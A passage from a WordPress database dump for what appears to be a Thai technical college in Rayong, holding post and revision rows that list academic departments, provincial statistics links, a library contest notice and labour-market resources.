\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></h4>\r\n</div>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n \r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b>\r\n\r\n<span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong>\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-06-13 09:45:24', '2018-06-13 02:45:24', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2977, 3, '2018-06-13 10:08:18', '2018-06-13 03:08:18', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf\">แผนกวิชาช่างยนต์</a></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาคหกรรมศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาผ้าและเครื่องแต่งกาย</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาอาหารและโภชนาการ</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการโรงแรม</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการท่องเที่ยว</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยีสารสนเทศ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชา Central Lab</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาคณิตศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาอังกฤษ</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาไทย</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาวิทยาศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาสังคมศึกษา</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาพลานามัย</span></li>\r\n</ul>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-06-13 10:08:18', '2018-06-13 03:08:18', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(2978, 3, '2018-06-13 10:11:24', '2018-06-13 03:11:24', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf\">แผนกวิชาช่างยนต์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างกล.pdf\">แผนกวิชาช่างกล</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาไฟฟ้า.pdf\">แผนกวิชาไฟฟ้า</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf\">แผนกวิชาอิเล็กทรอนิกส์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาก่อสร้าง.pdf\">แผนกวิชาก่อสร้าง</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf\">แผนกวิชาเครื่องมือวัดและควบคุม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาปิโตรเคมี.pdf\">แผนกวิชาปิโตรเคมี</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf\">แผนกวิชาเคมีอุตสาหกรรม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยียาง.pdf\">แผนกวิชาเทคโนโลยียาง</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาคหกรรมศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาผ้าและเครื่องแต่งกาย</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาอาหารและโภชนาการ</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการโรงแรม</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการท่องเที่ยว</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยีสารสนเทศ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชา Central Lab</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาคณิตศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาอังกฤษ</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาไทย</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาวิทยาศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาสังคมศึกษา</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาพลานามัย</span></li>\r\n</ul>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-06-13 10:11:24', '2018-06-13 03:11:24', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(2979, 3, '2018-06-13 10:13:52', '2018-06-13 03:13:52', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf\">แผนกวิชาช่างยนต์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างกล.pdf\">แผนกวิชาช่างกล</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาไฟฟ้า.pdf\">แผนกวิชาไฟฟ้า</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf\">แผนกวิชาอิเล็กทรอนิกส์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาก่อสร้าง.pdf\">แผนกวิชาก่อสร้าง</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf\">แผนกวิชาเครื่องมือวัดและควบคุม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาปิโตรเคมี.pdf\">แผนกวิชาปิโตรเคมี</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf\">แผนกวิชาเคมีอุตสาหกรรม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยียาง.pdf\">แผนกวิชาเทคโนโลยียาง</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการบัญชี.pdf\">แผนกวิชาการบัญชี</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการตลาด.pdf\">แผนกวิชาการตลาด</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการเลขานุการ.pdf\">แผนกวิชาการเลขานุการ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคอมพิวเตอร์ธุรกิจ.pdf\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาโลจิสติกส์.pdf\">แผนกวิชาโลจิสติกส์</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคหกรรมศาสตร์.pdf\">แผนกวิชาคหกรรมศาสตร์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาผ้าและเครื่องแต่งกาย.pdf\">แผนกวิชาผ้าและเครื่องแต่งกาย</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอาหารและโภชนาการ.pdf\">แผนกวิชาอาหารและโภชนาการ</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการโรงแรม</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาการท่องเที่ยว</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยีสารสนเทศ</span></li>\r\n <li><span style=\"color: #0000ff;\">แผนกวิชา Central Lab</span></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<ul>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาคณิตศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาอังกฤษ</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาภาษาไทย</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาวิทยาศาสตร์</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาสังคมศึกษา</span></li>\r\n <li><span style=\"color: #0000ff;\">หมวดวิชาพลานามัย</span></li>\r\n</ul>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-06-13 10:13:52', '2018-06-13 03:13:52', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(2981, 3, '2018-06-13 10:21:44', '2018-06-13 03:21:44', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf\">แผนกวิชาช่างยนต์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาช่างกล.pdf\">แผนกวิชาช่างกล</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาไฟฟ้า.pdf\">แผนกวิชาไฟฟ้า</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf\">แผนกวิชาอิเล็กทรอนิกส์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาก่อสร้าง.pdf\">แผนกวิชาก่อสร้าง</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf\">แผนกวิชาเครื่องมือวัดและควบคุม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาปิโตรเคมี.pdf\">แผนกวิชาปิโตรเคมี</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf\">แผนกวิชาเคมีอุตสาหกรรม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยียาง.pdf\">แผนกวิชาเทคโนโลยียาง</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการบัญชี.pdf\">แผนกวิชาการบัญชี</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการตลาด.pdf\">แผนกวิชาการตลาด</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการเลขานุการ.pdf\">แผนกวิชาการเลขานุการ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคอมพิวเตอร์ธุรกิจ.pdf\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาโลจิสติกส์.pdf\">แผนกวิชาโลจิสติกส์</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาคหกรรมศาสตร์.pdf\">แผนกวิชาคหกรรมศาสตร์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาผ้าและเครื่องแต่งกาย.pdf\">แผนกวิชาผ้าและเครื่องแต่งกาย</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาอาหารและโภชนาการ.pdf\">แผนกวิชาอาหารและโภชนาการ</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการโรงแรม.pdf\">แผนกวิชาการโรงแรม</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาการท่องเที่ยว.pdf\">แผนกวิชาการท่องเที่ยว</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยีสารสนเทศ.pdf\">แผนกวิชาเทคโนโลยีสารสนเทศ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/แผนกวิชา-Central-Lab.pdf\">แผนกวิชา Central Lab</a></li>\r\n</ul>\r\n \r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<ul>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดคณิตศาสตร์.pdf\">หมวดวิชาคณิตศาสตร์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดภาษาอังกฤษ.pdf\">หมวดวิชาภาษาอังกฤษ</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดภาษาไทย.pdf\">หมวดวิชาภาษาไทย</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดวิทยาศาสตร์.pdf\">หมวดวิชาวิทยาศาสตร์</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดสังคมศึกษา.pdf\">หมวดวิชาสังคมศึกษา</a></li>\r\n <li><a href=\"/wp-content/uploads/2018/02/หมวดพลานามัย.pdf\">หมวดวิชาพลานามัย</a></li>\r\n</ul>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-06-13 10:21:44', '2018-06-13 03:21:44', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(2986, 3, '2018-06-13 12:42:33', '2018-06-13 05:42:33', '', '1', '', 'inherit', 'closed', 'closed', '', '1-4', '', '', '2018-06-13 12:42:33', '2018-06-13 05:42:33', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2987, 3, '2018-06-13 14:16:37', '2018-06-13 07:16:37', '<img class=\"alignnone size-full wp-image-2988\" src=\"/wp-content/uploads/2018/06/13-6-2561-13-23-22.jpg\" alt=\"\" width=\"1062\" height=\"675\" />', 'ประชาสัมพันธ์!! กิจกรรมการประกวดแข่งขัน \"คำขวัญห้องสมุด\"', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%81', '', '', '2018-06-15 12:05:17', '2018-06-15 05:05:17', '', 0, 'http://www.technicrayong.ac.th/?p=2987', 395, 'post', '', 0),
(2988, 3, '2018-06-13 14:15:24', '2018-06-13 07:15:24', '', '13-6-2561 13-23-22', '', 'inherit', 'closed', 'closed', '', '13-6-2561-13-23-22', '', '', '2018-06-13 14:15:24', '2018-06-13 07:15:24', '', 2987, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-13-23-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(2989, 3, '2018-06-13 14:16:37', '2018-06-13 07:16:37', '<img class=\"alignnone size-full wp-image-2988\" src=\"/wp-content/uploads/2018/06/13-6-2561-13-23-22.jpg\" alt=\"\" width=\"1062\" height=\"675\" />', 'ประชาสัมพันธ์!! กิจกรรมการประกวดแข่งขัน \"คำขวัญห้องสมุด\"', '', 'inherit', 'closed', 'closed', '', '2987-revision-v1', '', '', '2018-06-13 14:16:37', '2018-06-13 07:16:37', '', 2987, 'http://www.technicrayong.ac.th/2987-revision-v1/', 0, 'revision', '', 0),
(2990, 3, '2018-06-15 12:05:26', '2018-06-15 05:05:26', '<img class=\"alignnone size-full wp-image-2988\" src=\"/wp-content/uploads/2018/06/13-6-2561-13-23-22.jpg\" alt=\"\" width=\"1062\" height=\"675\" />', 'ประชาสัมพันธ์!! กิจกรรมการประกวดแข่งขัน \"คำขวัญห้องสมุด\"', '', 'inherit', 'closed', 'closed', '', '2987-autosave-v1', '', '', '2018-06-15 12:05:26', '2018-06-15 05:05:26', '', 2987, 'http://www.technicrayong.ac.th/2987-autosave-v1/', 0, 'revision', '', 0),
(2994, 3, '2018-06-13 15:49:42', '2018-06-13 08:49:42', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n \r\n\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4043\" src=\"/wp-content/uploads/2018/10/2-10-2561-11-05-59.jpg\" alt=\"\" width=\"843\" height=\"376\" /> <a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"aligncenter size-full wp-image-4042\" src=\"/wp-content/uploads/2018/10/2-10-2561-11-06-56.jpg\" alt=\"\" width=\"845\" height=\"299\" /></a>\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a><a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"wp-image-3196 size-full alignleft\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg\" alt=\"\" width=\"965\" height=\"155\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-10-02 11:05:02', '2018-10-02 04:05:02', '', 0, 'http://www.technicrayong.ac.th/?page_id=2994', 0, 'page', '', 0),
(2995, 3, '2018-06-13 15:36:11', '2018-06-13 08:36:11', '', '13-6-2561 15-38-18', '', 'inherit', 'closed', 'closed', '', '13-6-2561-15-38-18', '', '', '2018-06-13 15:36:11', '2018-06-13 08:36:11', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg', 0, 'attachment', 'image/jpeg', 0),
